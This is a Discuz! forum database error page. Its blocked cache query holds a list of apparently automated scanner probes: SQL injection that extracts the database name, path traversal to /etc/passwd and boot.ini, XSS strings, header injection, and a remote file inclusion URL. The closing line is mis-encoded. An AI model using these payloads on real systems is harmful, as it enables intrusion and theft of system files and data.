Discuz! Database Error

(0) It is not safe to do this query
REPLACE INTO common_cache SET `cachekey`='threadclasscount_60' , `cachevalue`='a:1:{s:6:\"typeid\";a:77:{i:103;s:4:\"5340\";i:192;s:2:\"99\";i:104;s:4:\"1591\";i:105;s:2:\"99\";i:106;s:3:\"172\";i:107;s:3:\"219\";i:108;s:2:\"37\";s:14:\"103?aaa_flag=1\";s:4:\"3734\";s:4:\"103 \";s:4:\"4206\";s:11:\"103 and 3=3\";s:4:\"4135\";s:11:\"103 and 3=4\";s:4:\"4135\";s:27:\"103\\\\\\\' and \\\\\\\'a\\\\\\\'=\\\\\\\'a\";s:4:\"4135\";s:27:\"103\\\\\\\' and \\\\\\\'a\\\\\\\'=\\\\\\\'b\";s:4:\"4135\";s:35:\"103%\\\\\\\' and 3=3 and \\\\\\\'%\\\\\\\'=\\\\\\\'\";s:4:\"4135\";s:238:\"103 and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1\";s:4:\"4135\";s:254:\"103\\\\\\\' and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and \\\\\\\'1\\\\\\\'=\\\\\\\'1\";s:4:\"4135\";s:254:\"103%\\\\\\\' and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and \\\\\\\'%\\\\\\\'=\\\\\\\'\";s:4:\"4135\";s:49:\"103+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-\";s:4:\"4135\";s:7:\"103\\\\\\\'\";s:4:\"4135\";s:6:\"103%27\";s:4:\"4135\";s:10:\"103\\\\0\\\\\\\'\";s:4:\"4135\";s:11:\"103\\\\\\\\\\\\\\\'\";s:4:\"4135\";s:7:\"103JyI=\";s:4:\"4206\";s:8:\"103\\\\\\'\";s:4:\"4135\";s:4:\"103/\";s:4:\"4206\";s:15:\"103alert(42873)\";s:4:\"4135\";s:32:\"../../../../../../../../boot.ini\";s:4:\"1478\";s:35:\"../../../../../../../../boot.ini\\\\0\";s:4:\"1478\";s:56:\"boot.ini\";s:4:\"1478\";s:39:\"../../../../../../../../boot.ini\\\\0.jpg\";s:4:\"1478\";s:75:\"/.\\\\\\\\\\\\\\\\./.\\\\\\\\\\\\\\\\./.\\\\\\\\\\\\\\\\./.\\\\\\\\\\\\\\\\./.\\\\\\\\\\\\\\\\./.\\\\\\\\\\\\\\\\./boot.ini\";s:4:\"1478\";s:56:\"..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\boot.ini\";s:4:\"1478\";s:64:\"../..//../..//../..//../..//../..//../..//../..//../..//boot.ini\";s:4:\"1478\";s:80:\"../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini\";s:4:\"1478\";s:39:\"../../../../../../../../boot.ini\\\\0.htm\";s:4:\"1478\";s:19:\"file:///c:/boot.ini\";s:4:\"1478\";s:34:\"../../../../../../../../etc/passwd\";s:4:\"1476\";s:37:\"../../../../../../../../etc/passwd\\\\0\";s:4:\"1478\";s:37:\"\\\\0../../../../../../../../etc/passwd\";s:4:\"1478\";s:42:\"../../../../../../../../etc/passwd\\\\0.html\";s:4:\"1478\";s:41:\"../../../../../../../../etc/passwd\\\\0.jpg\";s:4:\"1478\";s:76:\".\\\\\\\\\\\\\\\\./.\\\\\\\\\\\\\\\\./.\\\\\\\\\\\\\\\\./.\\\\\\\\\\\\\\\\./.\\\\\\\\\\\\\\\\./.\\\\\\\\\\\\\\\\./etc/passwd\";s:4:\"1478\";s:11:\"/etc/passwd\";s:4:\"1476\";s:25:\"/./././././././etc/passwd\";s:4:\"1478\";s:82:\"../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd\";s:4:\"1478\";s:42:\"................etc/passwd\";s:4:\"1478\";s:59:\"/etc/passwd\";s:4:\"1478\";s:18:\"file:///etc/passwd\";s:4:\"1478\";s:66:\"../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd\";s:4:\"1478\";s:70:\"http://some-inexistent-website.com/some_inexistent_file_with_long_name\";s:4:\"1478\";s:36:\"/some_inexistent_file_with_long_name\";s:4:\"1478\";s:43:\"\r\n SomeCustomInjectedHeader:injected_by_wvs\";s:4:\"1478\";s:42:\"\n SomeCustomInjectedHeader:injected_by_wvs\";s:4:\"1478\";s:3:\"dir\";s:4:\"1478\";s:25:\"http://bbs.webscan.360.cn\";s:4:\"1478\";s:18:\"bbs.webscan.360.cn\";s:4:\"1478\";s:46:\"+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-\";s:4:\"1478\";s:120:\"103 and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e\";s:4:\"4135\";s:123:\"103\\\\\\\' and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5\";s:4:\"4135\";s:121:\"103%\\\\\\\' and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x\";s:4:\"4135\";s:104:\"103 and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() a\";s:4:\"4135\";s:107:\"103\\\\\\\' and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() \";s:4:\"4135\";s:107:\"103%\\\\\\\' and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database()\";s:4:\"4135\";s:103:\"103 and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() \";s:4:\"4135\";s:108:\"103\\\\\\\' and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database()%2\";s:4:\"4135\";s:106:\"103%\\\\\\\' and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database(\";s:4:\"4135\";s:20:\"103?myuotmwjjqxbmfbt\";s:4:\"4414\";s:20:\"105?ldeihmpvqezwjcld\";s:2:\"96\";s:26:\"http://120.26.55.211/s.txt\";s:4:\"1476\";s:26:\"a_long_name_file_not_exist\";s:4:\"1476\";s:36:\"PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\";s:4:\"1476\";s:32:\"amF2YXNjcmlwdDpwcm9tcHQoMTExKTt4\";s:4:\"1476\";s:19:\"c://windows/win.ini\";s:4:\"1476\";s:39:\"../../../../../../../../windows/win.ini\";s:4:\"1476\";s:47:\"../../../../../../../../../../windows/win.ini00\";s:4:\"1476\";s:39:\"../../../../../../../../etc/passwd\n.jpg\";s:4:\"1476\";s:44:\"../../../../../../../../windows/win.ini\n.jpg\";s:4:\"1476\";}}'

PHP Debug

No.FileLineCode
1forum.php67require(%s)
2source/module/forum/forum_forumdisplay.php544threadclasscount(%s, %f, %s, %s)
3source/function/function_forumlist.php400discuz_table->insert(Array, false, true)
4source/class/discuz/discuz_table.php81discuz_database::insert(%s, Array, false, true, %s)
5source/class/discuz/discuz_database.php60discuz_database::query(%s, %s, %s, true)
6source/class/discuz/discuz_database.php135discuz_database::checkquery(%s)
7source/class/discuz/discuz_database.php172discuz_database_safecheck::checkquery(%s)
8source/class/discuz/discuz_database.php362break()
bbs.zzsy.com Ѿ˳Ϣϸ¼, ɴ˸ķʲǸ.